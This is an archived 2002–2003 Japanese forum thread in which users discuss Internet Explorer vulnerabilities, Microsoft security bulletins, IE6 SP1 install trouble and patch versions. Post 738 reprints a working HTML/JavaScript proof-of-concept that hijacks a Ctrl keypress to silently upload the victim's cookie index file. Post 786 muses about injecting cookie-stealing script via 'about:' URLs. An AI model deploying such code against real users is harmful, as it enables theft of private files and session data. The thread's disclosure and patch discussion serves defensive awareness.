もとの状態に戻すにはどうしたらいいのでしょう?
IE6アンインストールしたら全部消える?

このスレッドを知る前に他の板でも聞いてしまったけど、こんなおばかな
事例へのお答えも少なく、こちらでも質問させていただきました。
怒らないでー。教えてー。お願い致します。

730 :名無しさん@お腹いっぱい。:02/07/21 18:30
>>729
モニターを縦にしてみましょう

731 :名無しさん@お腹いっぱい。:02/07/21 18:30
>>717
>WMP7.1のヘルプ→バージョン情報を見ると 7.01.00.3055になってる。
同じです

732 :初心者:02/07/21 20:49
>>730 してみました!(ノートだから軽くてヨカタ)
治ったかな〜?・・・だめみたいですぅ。。。

733 :初心者:02/07/21 22:12
・・・お願いです。教えてください。

734 :>>733:02/07/21 22:18
やったことないからシラン。

アンインストール⇒リカバリーCDROMでIE入れ直す⇒修正プログラム入れる

じゃない?

735 :名無しさん@お腹いっぱい。:02/07/21 22:20
なんでまたTechNetなんだ?
パチ当てならアップデートで十分だろうに・・・

736 :名無しさん@お腹いっぱい。:02/07/21 22:24
・IE6を上書きインストール
・修正プログラムのアンインストール
・IE6を一旦消してまた入れる
・システムの復元
・修正プログラムの/x解凍して手作業で直す
考えられる修正方法

737 :初心者:02/07/21 22:34
>>735 Frethem対策ページから飛んだためです。
>>734-736 
ご指導ありがとうございます。まずIE6消してまた入れてみます。

738 :Pressing CTRL in IE is dangerous :02/07/24 23:07
http://archives.neohapsis.com/archives/bugtraq/2002-07/0250.html

Exploit:
-------------------------- CUT HERE -------------------------------
<!div id=h style="zoom:0.0001">
<!form name=u enctype="multipart/form-data" method=post action=upload.php>
<!input type=file name=file></form></div>
<!script>
//uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat";
uploadFile="..\\Cookies\\index.dat";
function gotKey(){
if (!event.ctrlKey) return;
document.onkeydown = null;
event.keyCode = 86;
window.clipboardData.setData("Text",uploadFile);
(p=document.forms.u.file).focus();
p.onpropertychange = function(){document.forms.u.submit()};
} document.onkeydown = gotKey;
window.onload=function(){document.body.focus()};
<!/script>
-------------------------- CUT HERE -------------------------------

Old advisories:
===============
#7 [2002-05-19] "IE dot bug"
http://online.securityfocus.com/archive/1/273168
#6 [2002-05-15] "Opera javascript protocoll vulnerability"
http://online.securityfocus.com/archive/1/272583
#5 [2002-04-26] "Mp3 file can execute code in Winamp."
http://online.securityfocus.com/archive/1/269724
#4 [2002-04-15] "Using the backbutton in IE is dangerous."
http://online.securityfocus.com/archive/1/267561

739 :名無しさん@お腹いっぱい。:02/07/31 12:31
英語版SP3が出ました。
http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2KSP3.exe

さっさと日本語版出せ。

740 :名無しさん@お腹いっぱい。:02/07/31 12:39
>>731

wmp7.1をインストールしてある
フォルーダーの中のwmplayer.exe
を右クリックしてバージョンを見てみな。


741 :名無しさん@お腹いっぱい。:02/07/31 19:01
ようやくSP3か・・・
今週中には出るかな?

742 :Opera:02/07/31 21:11
IEやIEコンポ使ってるタブブラ使ってるやつはセキュリティを語る資格ないな

743 :名無しさん@お腹いっぱい。:02/07/31 22:11
>>742
使って無くても、WindowsユーザーはIEと共同体だ。

744 :名無しさん@お腹いっぱい。:02/07/31 22:26
>>742
どのブラウザでも然して変わらない

>>743
95以前ならIEと心中する必要はない

745 :名無しさん@お腹いっぱい。:02/08/02 12:35
ケチつけたくてつけたくてたまらないからとりあえずレスしてみました
みたいなレスだな。

746 :名無しさん@お腹いっぱい。:02/08/10 11:21
あ!

747 :名無しさん@お腹いっぱい。:02/08/11 18:00
い?

748 :名無しさん@お腹いっぱい。:02/08/11 18:04
スレッド一覧はこちらを今見たら、ノートンが反応しました。大丈夫でしょうか?

749 :いもにーチャン:02/08/11 20:26
IEどうしようもないね、バッファーオ−バーランする
コーディングしかできない連中がイッパイいるってことね。
マイクロアフォか、延々といたちごっこ繰り返す罠だな。
いいかげんソース公開しろ、俺が直してやるぜ。



750 :名無しさん@お腹いっぱい。:02/08/11 20:32
ぐちゃぐちゃなので公開しません

751 :いもにーチャン:02/08/11 20:39
>>750
だろうな、クロウトでも解析できない罠だな。
がんばって商売してくらい!!

752 :cheshire-cat ◆CATJR.v6 :02/08/11 21:00
IE6SP1は、まだなのかなぁ。

753 :名無しさん@お腹いっぱい。:02/08/11 21:17
>>752
10年後に合いましょう

754 :ななし:02/08/21 23:38
米Microsoft、IEのSSL実装に「なりすまし」可能な脆弱性
http://www.watch.impress.co.jp/internet/www/article/2002/0819/iessl.htm
↑これって
↓かな?
http://pc.2ch.net/test/read.cgi/sec/1016256558/16

755 :MS02-047:02/08/23 09:51
MS02-047 に関する情報
「MS02-047: Internet Explorer 用の累積的な修正プログラム (Q323759)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-047ov.asp
この修正プログラムをインストールすることにより、
悪意のあるユーザーによる以下の攻撃を防ぐことができます。

(高) Gopher プロトコルを解釈する部分の脆弱性を悪用し
バッファのオーバーラン攻撃が行われる可能性のある問題です。
MS02-027 では、回避策のみをお伝えいたしましたが今回の
修正プログラムを適用することで対策することができます。
(高) 特別にフォーマットされたテキストを表示するために使用される
ActiveX コントロールの脆弱性を悪用しバッファのオーバーラン攻撃が
行われる可能性のある問題です。
(中) XML データを表示する HTML ディレクティブを処理する方法が
不適切であったために、ローカルファイル を読み取られる可能性のある
問題です。
(中) [ファイルのダウンロード] ダイアログ ボックス内のファイルの
ダウンロード元の場所を表示する方法に問題があり、
ユーザーに悪意のあるファイルを信頼されたサイトからのものであると
思い込ませ、ダウンロードするよう誘導される可能性があります。
(高) MS02-005 で修正した 「フレームのドメイン照合」 の脆弱性の
新たに確認された変種です。この変種により、ローカル システムの
実行可能ファイルを呼び出し悪用される可能性があります。
(しかし、実行可能プログラムにパラメータを渡すことはできないため、
パラメータを指定する必要のあるプログラムを操作する事は不可能です。)
(中) MS02-023 で最初に説明した
「ローカル HTML リソースのクロスサイト スクリプティング」 の脆弱性の
新たに報告された変種です。
クロスサイトスクリプティング (CSS) により、スクリプトを
ローカルコンピュータゾーンで実行される可能性がある問題です。

756 :名無しさん@お腹いっぱい。:02/08/23 11:38
>>755 累積修正パッチ入れてみた。ウィンドウズアップデートでも更新可。
バージョン情報にQ323759が追加されていた。IE6なんだけど、更新バージョン
に7個もQ〜が並んでる。早くSP1出してくれよー。

757 :名無しさん@お腹いっぱい。:02/08/23 15:40
俺なんか8個並んでるよ・・・・。

758 :名無しさん@お腹いっぱい。:02/08/23 16:26
俺のところは、この8つなんだけど
皆は、どう?

Q306121; Q312461; Q313675; Q316059;
q313829; q319182; Q321232; Q323759;

759 :名無しさん@お腹いっぱい。:02/08/23 16:28
こんなん出ました。
http://w3j.org/nazokb/jp4110000.html

760 :名無しさん@お腹いっぱい。:02/08/23 16:48
>>758
Windows Me,XPのひとはMS02-014が対象外なのでq313829を除く7つだ。

761 :名無しさん@お腹いっぱい。:02/08/23 18:13
>>758
6個だった(Windows2000 sp3, IE6)
Q312461, Q313675, Q316059, q319182, Q321232, Q323759

762 :名無しさん@お腹いっぱい。:02/08/23 21:02
Q321232とQ323759の2つしかないよ

763 :名無しさん@お腹いっぱい。:02/08/23 22:05
おれは7つだ。758の一番初めのやつがないよ
IEのVerは、6.026
758のバージョン教えれ

764 :名無しさん@お腹いっぱい。:02/08/23 23:42
> Gopher プロトコルを解釈する部分の脆弱性を悪用し
> バッファのオーバーラン攻撃が行われる可能性のある問題

先日、2chに貼られてたリンクから、これを悪用したらしきページをふんだんだけど
どんなコードが実行されたのか不安なんで、どなたかリンク先分かりますかね。
ひよこのGIFが右から左に更新してるページでした。


765 :5.5SP2の場合:02/08/23 23:42
SP2,Q319182,Q321232,Q323759

766 :名無しさん@お腹いっぱい。:02/08/23 23:43
更新じゃないや。行進だ。ひよこの行進。 

767 :名無しさん@お腹いっぱい。:02/08/23 23:48
WinMeで6.026だけど、Q321232とQ323759の二つだけ。

768 :名無しさん@お腹いっぱい。:02/08/23 23:56
IE5は大丈夫なのですか?

769 :名無しさん@お腹いっぱい。:02/08/24 02:47
一つしかなくても、累積パッチだから
過去の穴は全部塞がれていると思う

770 :名無しさん@お腹いっぱい。:02/08/24 03:11
>>767
同じく。
最近再インストールしてWindousUpDateでいっぺんにパッチ当てたからかな?

771 :大至急!!:02/08/24 04:37
MS02-047のパッチを当てたらMS02-046は当てなくていいんですか?

772 :名無しさん@お腹いっぱい。:02/08/24 06:47
もう一回WindousUpDate行って重要な更新がなくなればいいんだよ。

773 :名無しさん@お腹いっぱい。:02/08/24 12:04
今入れたら、こうなった。

Donut : RAPT #18y
OS : Windows 98 (4.10.2222) A
IE : 6.0.2600.0000 ;Q321232;q313829;Q323759;


774 :名無しさん@お腹いっぱい。:02/08/24 13:07
IEの最新バージョンは、
http://pc.2ch.net/test/read.cgi/sec/1021363841/118

775 :名無しさん@お腹いっぱい。:02/08/24 21:38
これは?
http://www.mainichi.co.jp/news/flash/keizai/20020825k0000m020046000c.html

776 :名無しさん@お腹いっぱい。:02/08/24 22:50
>>771 君がターミナル サービスを提供する Web サイトの Web マスター
ならば必要、そうでなければMS02-047のみ必要。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-046.asp

>>775 なんだか不親切な記事だね。

777 :名無しさん@お腹いっぱい。:02/08/25 00:26
8月24日 20:41
米マイクロソフト:
ネット閲覧ソフトに不具合 修正ソフト提供
 米マイクロソフトは22日、同社のインターネット閲覧ソフトの「インターネット・
エクスプローラ」とビジネス用ソフト「オフィス」にセキュリティー上問題があると
警告した。同社は対応するソフトを無料で提供し、使用を呼び掛けている。
問題になったのは、最新のインターネット・エクスプローラ3種類と「オフィスXP」
など13種類のソフト。(ニューヨーク共同)
[毎日新聞8月24日] ( 2002-08-24-20:39 )

なんじゃこりゃ? さすが経済記者だな、こいつ。

778 :771:02/08/25 00:44
レスくれた方さんくす。

>>772
WindousUpDateはあまりやりたくないんです。
スパイウェア入れられるみたいなので。

>>776
多分使っていないと思います。
よってMS02-047だけにしておきます。

779 :名無しさん@お腹いっぱい。:02/08/25 01:18
>>768
ちょっと遅いかも知れんが・・
IE5は、マイクロソフトはサポートを打ち切った。
よって、セキュリティホールが発覚してもパッチは出ない。

今回、5.0用がないのも、安全だからということではない。
IE5.5ないし、6.0にしろ、ということだね。



780 :名無しさん@お腹いっぱい。:02/08/25 02:41
んでもってIE5.5ないし、6.0にすると重いから
新しいの飼え!ってこと?


781 :名無しさん@お腹いっぱい。:02/08/25 11:00
>スパイウェア入れられるみたいなので

おまえのプライバシーなんか 誰も興味ねーよ 自意識過剰クン
キミは自分が思ってるほど誰からも重要視されとらんのよ

782 :名無しさん@お腹いっぱい。:02/08/25 11:09
やましいことでもあるんじゃないのか?

783 :名無しさん@お腹いっぱい。:02/08/25 11:31
>>781,782
お前ら本当にバカだな。
ちょっとは社会のこと勉強しろ。

784 :名無しさん@お腹いっぱい。:02/08/27 11:14
そんなに不安ならIEに依存しないタブブラウザやNNを使えばいいんだよ

785 :名無しさん@お腹いっぱい。:02/08/27 14:52
>>784
いちいち上げんなボケ。

786 :茂林みらの ◆Whd01yV2 :02/08/29 21:54
これって、クロスサイトスクリプティングの脆弱性というものですか?

InternetExplorerでアドレス欄に「about:<script>window.open("http://www.yahoo.co.jp/")</script>」
って入れるとウインドウが開いてヤフーがでます。

どうも「about:」に続いてHTMLコードを書くだけで、HTMLコードの部分のタグが有効になったページが
表示されます。
このHTMLコードのところにscriptタグに続いてクッキーをアップロードするJavaScriptや
特定の危険なページを開かせるコードとか書くと危険な気がします。

すでにこのことは、がいしゅつでしょうか?

787 :名無しさん@お腹いっぱい。:02/08/30 23:28
age

788 :名無しさん@お腹いっぱい。:02/08/31 10:46
最新バージョンがQ321232なんだけど、
最近ちょっと気づいたことがある。

IE開くと、ホームページがgoogleに設定されてるんだけど、
googleに接続する前に一瞬216.〜につながれてるみたい…

IE6.0に更新するまではこんなことなかったと思うのだけど。

あと↑でいわれてる奴ってALEXA(スペル違うかも)なの?
ad-awareでレジストリでIEのところにでてきたので削除したけど。
その時寝ぼけててバックアップとらずに削除しちゃったけど今のところなんともないや。


789 :名無しさん@お腹いっぱい。:02/08/31 10:52
216.〜につながらずにどうやってgoogleにいくのかと聞きたい。

www.google.com www.google.co.jp 216.239.33.101
google.com 216.239.51.100 216.239.35.100
google.co.jp 216.239.37.100 216.239.39.100 216.239.33.100 216.239.35.100


790 :名無しさん@お腹いっぱい。:02/08/31 10:56
>>788
googleは 216.239.33.101 だからそれが表示されただけじゃないかな

791 :788:02/08/31 10:57
ヽ(゚∀゚)ノアヒャ



ありがとうございました。

792 :名無しさん@お腹いっぱい。:02/09/01 12:03
あげ

793 :恒例イベントですよ〜:02/09/08 09:13
http://www.zdnet.co.jp/news/0209/06/ne00_mshole.html

広範囲に影響、Windowsの新たな脆弱性

同社はこのセキュリティホールを深刻度「高」として、セキュリティ警告を発行。WindowsおよびMacintosh対応プログラムを含め、
1ダース以上のMicrosoft製品で、Webサイトやソフトウェアコードの信頼性確認に利用される「電子証明書」の処理に影響を及ぼす可能性がある。

 この欠陥を悪用すれば、正規の電子証明書を発行しているWebサイトに、別の偽の電子証明書を発行させ、
利用者のコンピュータに不正アクセスしたり、その利用者のパスワードやクレジットカード番号を盗み出すことができる。



794 :恒例イベントですよ〜:02/09/08 09:21
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS02-050.asp

こっちも

795 :IE6SP1 Coming soon!:02/09/09 18:13
MicrosoftがIE 6 Service Pack 1を準備中
Microsoftが,Internet Explorer(IE) 6 Service Pack 1(SP1)を準備して
いることが 明らかになった。
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20020909/1/


796 :名無しさん@お腹いっぱい。:02/09/09 18:45
おぉー後三日もすれば落とせるな

797 :名無しさん@お腹いっぱい。:02/09/10 03:22
>>795
遅きに失した感ありすぎ。

798 :名無しさん@お腹いっぱい。:02/09/10 17:39
英語とドイツ語はもう出てるな

799 :深刻度「高」:02/09/10 21:04
、イスラエル企業が警告
http://japan.internet.com/webtech/20020910/10.html

800 :深刻度「高」:02/09/10 21:05
題名が変だったスマソ

IE に新たな脆弱性、イスラエル企業が警告
http://japan.internet.com/webtech/20020910/10.html

801 :名無しさん@お腹いっぱい。:02/09/10 21:29
サービスパック出しても次々と…
もう駄目だこりゃ

802 :名無しさん@お腹いっぱい。:02/09/10 22:32
Microsoft VM

803 : :02/09/10 23:05
http://slashdot.jp/article.pl?sid=02/06/15/060248&mode=thread

メギャーン

804 : :02/09/11 05:49
http://www.watch.impress.co.jp/internet/www/article/2002/0910/mjvm.htm


Microsoftの「Internet Explorer(IE)」に付随するMicrosoft製のJava環境に複数の深刻な
セキュリティーホールが発見された。このセキュリティーホールを発見したのはフィンランドの
Online Solutions社で、Microsoftはこの問題を認め、現在パッチを準備している最中だという。
9日にMicrosoftより発表された「Internet Explorer 6 SP1」では、未対応の問題である。


805 :名無しさん@お腹いっぱい。:02/09/11 16:57
穴のあいた ざる

806 :名無しさん@お腹いっぱい。:02/09/11 17:22


807 :名無しさん@お腹いっぱい。:02/09/12 15:50
MS02-050はmacの人のみ?
解説読んだが意味分からん。

http://www.microsoft.com/japan/technet/security/bulletin/ms02-050.asp

808 :名無しさん@お腹いっぱい。:02/09/12 15:55
...

809 :名無しさん@お腹いっぱい。:02/09/12 16:20
>>807
よく読めよ。影響を受けるソフトウェアのところにかいてあるだろう。

810 :名無しさん@お腹いっぱい。:02/09/15 08:11
Becky!2が2.05.05でIE6 SP1を入れるとHTMLメール作成で落ちるからこれに対処する修正を施した2.05.06が出たが、
IE6 SP1の日本語版が出てない現状では検証のしようがねーぞ。

811 :名無しさん@お腹いっぱい。:02/09/15 08:22
ってか、もう隠れリリースされてたのか。
http://download.microsoft.com/download/ie6sp1/finrel/6_sp1/W98NT42KMeXP/JA/ie6setup.exe

812 :名無しさん@お腹いっぱい。:02/09/15 08:49
↑トホホ、コンポーネントダウソできず。

813 :名無しさん@お腹いっぱい。:02/09/15 12:29
パッチをちゃんと入れてたらSP1を入れる必要はないんでしょ?
なんか怖い。

814 :名無しさん@お腹いっぱい。:02/09/15 12:33
人柱どもの報告を待ちませう

815 :名無しさん@お腹いっぱい。:02/09/19 13:24
IE6 SP1日本語版リリース
http://www.microsoft.com/windows/ie_intl/ja/

http://pc.2ch.net/test/read.cgi/sec/1021363841/143-

816 :名無しさん@お腹いっぱい。:02/09/19 18:51
IE6SP1 readme から抜粋。

・Window.open はフルスクリーンモードでは開けなくなった
・Window.{move,resize,open} メソッドを使ってウィンドウを画面の外に移動させることはできなくなった
・COM サーバーをインストールするには ActiveX を有効にする必要がある
・cookie を使うためにはサーバ名が [A-Za-z0-9\-.]* でなければならない
・WebOC はインターネット上では利用できなくなった
・OBJECT タグの codeBase 属性はローカル パスを指定できなくなった
・制限付きゾーンではフレームと IFRAME が無効になる
・ファイルのダウンロード ダイアログ ボックスの変更
・Gopher プロトコルは既定では無効になった


817 :名無しさん@お腹いっぱい。:02/09/19 19:42
>>816
結局SP1はいいの? 悪いの?

818 :名無しさん@お腹いっぱい。:02/09/19 21:39
>>814
Win2000SP3+Hotfix
これにIE6SP1適用で問題なしです。

>>817
SP1は適用してもいいかと。。。

819 :名無しさん@お腹いっぱい。:02/09/19 22:15
自分、SP1入れたら、調子悪くなって、ネットできなくなったんで
削除した。XPです。

820 :名無しさん@お腹いっぱい。:02/09/19 22:32
WinME+IE6SP1+MS02-052で現在異常なし。

821 :名無しさん@お腹いっぱい。:02/09/19 23:12
SP1がそもそもインスト出来ない。
何度やっても途中でポシャる。
それよりもPFWplusの表示異常なんとかして。
質問を送ったのにマカフィーときたら1週間以上放置。

822 :名無しさん@お腹いっぱい。:02/09/19 23:20
オフラインなんちゃらと上級オーサリングがインストされてないって文句いうが
おまえがインストしないんじゃねーかIEよ

使わないからいいや

823 :名無しさん@お腹いっぱい。:02/09/19 23:52
スパイウエアが5個インストールされた。

824 :名無しさん@お腹いっぱい。:02/09/19 23:58

SP1のこと

825 : :02/09/19 23:59
http://www.430.jp/rak2/user/ryuugasakikaori/

826 :823:02/09/20 00:01
>>823
訂正
スパイウエアかどうかは不明。Ad-awareで検出されたファイルが5個だった。


827 :817:02/09/20 00:19
レスさんくすでした。
念のため色々バックアップ取ってから入れよう・・・。

828 :名無しさん@お腹いっぱい。:02/09/20 00:19
削除して良しですか?

829 :名無しさん@お腹いっぱい。:02/09/20 00:21
Alex飼ってみようかな♪

830 :名無しさん@お腹いっぱい。:02/09/20 00:22
消してヨシ

831 :名無しさん@お腹いっぱい。:02/09/20 01:36
MS02-052って、
http://www.microsoft.com/japan/technet/security/bulletin/ms02-052.asp
この情報によるとWindows Updateからしか入手できないようですけど
ファイルで入手できないでしょうか?


832 :名無しさん@お腹いっぱい。:02/09/20 04:30
>>831
http://pc3.2ch.net/test/read.cgi/win/1024631995/308

何故ファイルで必要なのでしょうか?

833 :名無しさん@お腹いっぱい。:02/09/20 07:44
>>832
あちらの板にあったのですね。ありがとうございます。

諸事情で、ネット接続できないPCを持っていますので。
今後、Windows Updateのみの配布形式に徐々に移行していくのでしょうか・・・



834 :名無しさん@お腹いっぱい。:02/09/21 19:55
SP1入れたら、フリーズする様になった。

835 :名無しさん@お腹いっぱい。:02/09/22 00:02
他板でもSP1を入れて不具合が出てる人が続出ですね。

結論 SP1は入れるな

836 :名無しさん@お腹いっぱい。:02/09/22 01:56
このフリーズはSP1のせいか!

837 :名無しさん@お腹いっぱい。:02/09/22 14:35
フリーズはしないんだがMS02-052入れてもヴァージョンとこに出てこない
Windows Updateではもう入れたことになってるからいいのか?

838 :名無しさん@お腹いっぱい。:02/09/22 23:34
>>837
MS02-052はJAVA仮想マシンのバグ修正だから
IEの修正と直接は関係無い。よってIEのバージョンには出てこない。


839 :名無しさん@お腹いっぱい。:02/09/23 10:23
MSめ!!重要な更新にSP1入れやがって!!

840 :名無しさん@お腹いっぱい。:02/09/26 22:05
証明書確認の問題により、IDが偽装される (Q328145) (MS02-050)
http://www.microsoft.com/japan/technet/security/bulletin/ms02-050.asp
今回の更新内容
Internet Explorer for Mac (for OS 8.1 to 9.x) および
Internet Explorer for Mac (for OS X) の問題を修正するプログラムを
公開しました。

841 :186:02/09/26 22:35
>>840
それよか MS02-050 のバグ修正版をはやく出せぃ!!>M$

842 :名無しさん@お腹いっぱい。:02/10/05 06:12
MS02-052入れたら立ち上がらなくなった・・・・
SafeModeでスキャンディスクしてもその後固まってしまう・・・・
(WinMe+IE6/SP1)

843 :名無しさん@お腹いっぱい。:02/10/05 07:26
今さっき6.0SP1をインスコしたよ〜。
今これで見てるんだぜ〜。OutPost+Proxomitronで
完璧なんじゃないんかな〜って自己満足してまーーす。

844 :名無しさん@お腹いっぱい。:02/10/05 10:27
先日、IE 6 SP1 にしたら「エラーになった」と文句言ってきて、
オレがていねいにアドバイスしてやったヤツが、まぁ〜た、
  「OE で、エラーがでました!」
とか報告してきやがった。粘着ヴォケは手がつけられん

845 :名無しさん@お腹いっぱい。:02/10/05 11:28
>>842 パッチ当てるときはFWやウィルス対策ソフトなどの常駐アプリを
停止させて行わないと、不具合出ることあるよ。あと、パッチは古い順に
当てて、一つ当てるごとに再起動する。
WinME+IE6SP1+MS02-050+MS02-052+MS02-054+MS02-055で無問題。

846 :名無しさん@お腹いっぱい。:02/10/05 11:51
WinME ユーザーから質問あったけど、
IE アンインストールで「以前の Windows の環境に戻す」とかにして、
Win再起動して、Program Files\Internet Explorer を削除してから、
Microsoft から IE 6 SP1 のファイルをすべてダウンロードしてから、
「カスタムインストール」でインスコ。
さらに、MS02-008パッチあて とか、わけのわからん指示もあるが…

847 :名無しさん@お腹いっぱい。:02/10/05 18:11
>>845
もちろん常駐アプリは止めてやったんですが・・・。
でもパッチ当てる順番はWindowsUpDateでやったのでよくわからんです。


848 :名無しさん@お腹いっぱい。:02/10/07 12:12
OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法
http://pc.2ch.net/test/read.cgi/sec/1021363841/168
にInternet Explorerの最新バージョンをOS別にまとめました。

849 :名無しさん@お腹いっぱい。:02/10/07 14:19
http://pc.2ch.net/test/read.cgi/sec/1021363841/168-n

850 :名無しさん@お腹いっぱい。:02/10/07 15:16
クリップボードの内容を攻撃者に盗まれるという脆弱性あり。
http://homepage2.nifty.com/spw/secure/008/index.html
http://pc3.2ch.net/test/read.cgi/win/1031641815/391

Proxomitronをバイパスモードに切り替えて検証した結果、IE6 SP1でも再現可能。
MSは認識していない模様。
Proxomitron使用者は以下のフィルタを導入すること。

Name = "ClipBoard Unsniffer"
Active = TRUE
Limit = 256
Match = "clipboardData"
Replace = "proxClipBoardData"

Proxomitron非使用者は「スクリプトによる貼り付け処理の許可」を無効にすること。

851 :名無しさん@お腹いっぱい。:02/10/07 15:39
>>850 おおサンクス。確かにIE6SP1で再現された。

852 :名無しさん@お腹いっぱい。:02/11/05 14:29
もうダメポ

853 :名無しさん@お腹いっぱい。:02/11/20 15:26
マイクロソフト,セキュリティ・ホールの深刻度に関する評価方法を変更
http://pc.2ch.net/test/read.cgi/sec/1021363841/215

854 :名無しさん@お腹いっぱい。:02/11/21 11:19
MS02-065
「MS02-065: Microsoft Data Access Components のバッファオーバーラン
により、コードが実行される (Q329414)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-065ov.asp
MS02-066
「MS02-066: Internet Explorer 用の累積的な修正プログラム (Q328970)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-066ov.asp

http://pc.2ch.net/test/read.cgi/sec/1021363841/216-218

855 :名無しさん@お腹いっぱい。:02/11/21 21:32
恒例行事age

856 :痴呆:02/11/22 04:33
オミトロンやFWでガチガチに固めてても、うpでーと必須?
(ガチガチといっても、マニュアル以上の事はできないけど)

857 :名無しさん@お腹いっぱい。:02/11/24 00:30
>>856
バグをどうやって塞ぐのか分かってるか?

858 :名無しさん@お腹いっぱい。:02/11/28 23:59
http://www.asahi.com/business/update/1127/034.html

マイクロソフト、政府向けなどにOSの「設計図」公開


859 :名無しさん@お腹いっぱい。:02/12/02 10:04
MDAC2.7インストールしようとした時に、
常駐アプリ全て終了させても
使用中のアプリケーションの終了を促すダイアログが表示されるんだけど、
どうしたらいいの?

使ってるOSは、WinNT4.0Serverです。
IIS等のサービスを終了させてもダメですた。


860 :名無しさん@お腹いっぱい。:02/12/02 10:29
>>859 インスコするときに説明するダイアログが出てたはずだけど。
どうしたらいいの → 使用中のアプリを終了させる。
http://www.microsoft.com/japan/msdn/data/download/mdac/27/27.asp


861 :名無しさん@お腹いっぱい。:02/12/02 10:36
MS02-065、MDAC2.7関係は
http://pc.2ch.net/test/read.cgi/sec/1021363841/250-251のリンク先も参照。

862 :859:02/12/02 19:06
>860
いや、全てのアプリと、IIS等のサービスを
終了させても、
”システムプロセスで使用されている”
と言ったエラーメッセージが表示されてしまうんだけど・・・

システムプロセスで使用されている場合は、
更新不可能なのかな?


863 :名無しさん@お腹いっぱい。:02/12/02 19:53
>>862 セーフモードでも使用中になる?

864 :名無しさん@お腹いっぱい。:02/12/03 13:31
age

865 :859:02/12/03 23:23
>862
NT4にはセーフモードは無いです。


866 :名無しさん@お腹いっぱい。:02/12/03 23:48
セキュリティのかかった場所に移動しようとすると
「ページを表示できません」
になります
どうしたらいいのでしょうか?
誰か助けて下さい。
「SSL2.0を使用する」と
「SSL3.0を使用する」にはチェックしたのですが
何も変わりませんでした

867 :_:02/12/04 00:50
★★非IE系ブラウザ★★
オペラ
http://jp.opera.com/
http://pc3.2ch.net/test/read.cgi/win/1036518411/

ネスケ
http://wp.netscape.com/ja/

Mozilla
http://jt.mozilla.gr.jp/

Mosaic (わらい)
http://archive.ncsa.uiuc.edu/SDG/Software/Mosaic/


★★ブラウザランキング★★
http://pc3.2ch.net/test/read.cgi/software/~~~~303519/


868 :名無しさん@お腹いっぱい。:02/12/04 20:50

ttps://www.netsecurity.ne.jp/article/1/7677.html
IE、OE の安全な利用には高度な知識と情報収集能力が必要!?(2002.12.3)

 今回、マイクロソフト社がリリースした MS-066 (註MS02-065の間違い) パッチは、IEやOEは、
初心者向けではないことを端的に示している。
 パソコンを買った時にタダでついているIE、OEをそのまま利用している人を見てもただの初心者
と思ってはいけない。高度な知識と情報収集能力を兼ね備えたエキスパートか、IT社会の健全な
成長のための無垢な犠牲者のどちらかなのである。読者諸氏には、周知の事実だと思うが、
つねに脆弱性と隣り合わせのIE、OE利用者の場合、初心者がトラブルなく利用できているという
状態は、偶然の産物でしかありえない。それは無垢な犠牲者の予備軍なのである。
[Prisoner Langley]

869 :cheshire-cat ◆PhCATJR.v6 :02/12/04 20:55
あえてレス。
IEはちょっと。。。。。んだけど。

OEは、送信専用なら、これだけhtml編集に有用なメーラーは無いっす。
htmlメルの海辺画像とか背景貼り付けってのは、ネットナンパに最も有効な手段でし。

受信の方は。
OEのメルテキスト化機能があまり膾炙していないのかなぁ。
そこらへんは、今後啓発してきましょ(らぶ

870 :名無しさん@お腹いっぱい。:02/12/04 22:49
モザイクってまだあったんだ・・・

>>869
でもお金出してベッキーとかユードラとかあたりをレジストしちゃった人は
OEにしにくいのかもね・・・、おれもそのクチだけど

871 :cheshire-cat ◆PhCATJR.v6 :02/12/05 07:19
>>870
テキスト化と言えば、ポスペも。
んでも非対応メーラーの相手に、ペットが拡張子ppdのファイルになってまって、「ウイルス?」と疑われたりするけど。

872 :名無しさん@お腹いっぱい。:02/12/05 12:07
昔掲示板で何度か答えたことがあるな
「ppdってファイルが添付されてたんですけど・・・何ですかこれ?」
って、もちろん質問者は女性名のステハン。


873 :名無しさん@お腹いっぱい。:02/12/05 15:07
「MS02-068: Internet Explorer 用の累積的な修正プログラム (324929) 」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-068ov.asp
概要
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS02-066 : Internet Explorer 用の累積的な修正プログラム
(Q328970) で修正された問題に加えて、新たに 1つの問題を排除します。
対象となる製品
・ Microsoft Internet Explorer 5.5 Service Pack 2
・ Microsoft Internet Explorer 6
・ Microsoft Internet Explorer 6 Service Pack 1
Microsoft Internet Explorer 5.01 は、この問題の影響を受けません。

http://pc.2ch.net/test/read.cgi/sec/1021363841/260

874 :名無しさん@お腹いっぱい。:02/12/05 22:10
update激重だね

875 :名無しさん@Emacs:02/12/06 10:10
http://www.pivx.com/larholm/unpatched/

ここの件数が 0 になるのはいつ。

876 :名無しさん@お腹いっぱい。:02/12/09 18:33
859 は、結局解決したのか?

877 :名無しさん@お腹いっぱい。:02/12/14 20:15
漏れら極悪非道のageブラザーズ!
今日もネタもないのにageてやるからな!
 ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ∧_∧   ∧_∧    age
 (・∀・∩)(∩・∀・)    age
 (つ  丿 (   ⊂) age
  ( ヽノ   ヽ/  )   age
  し(_)   (_)J

878 :名無しさん@お腹いっぱい。:02/12/16 19:26
>876
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20021210/1/


879 :名無しさん@お腹いっぱい。:02/12/18 19:37
age


880 :山崎渉:03/01/15 15:55
(^^)

881 :名無しさん@お腹いっぱい。:03/02/08 20:15
放置プレイ?
ttp://japan.internet.com/webtech/20030206/11.html

882 :名無しさん@お腹いっぱい。:03/02/09 12:31
>>881
「OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法」でガイシュツ
http://pc.2ch.net/test/read.cgi/sec/1021363841/330-335n

883 :山崎渉:03/04/17 12:28
(^^)

884 :山崎渉:03/04/20 06:09
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

885 :山崎渉:03/05/22 02:13
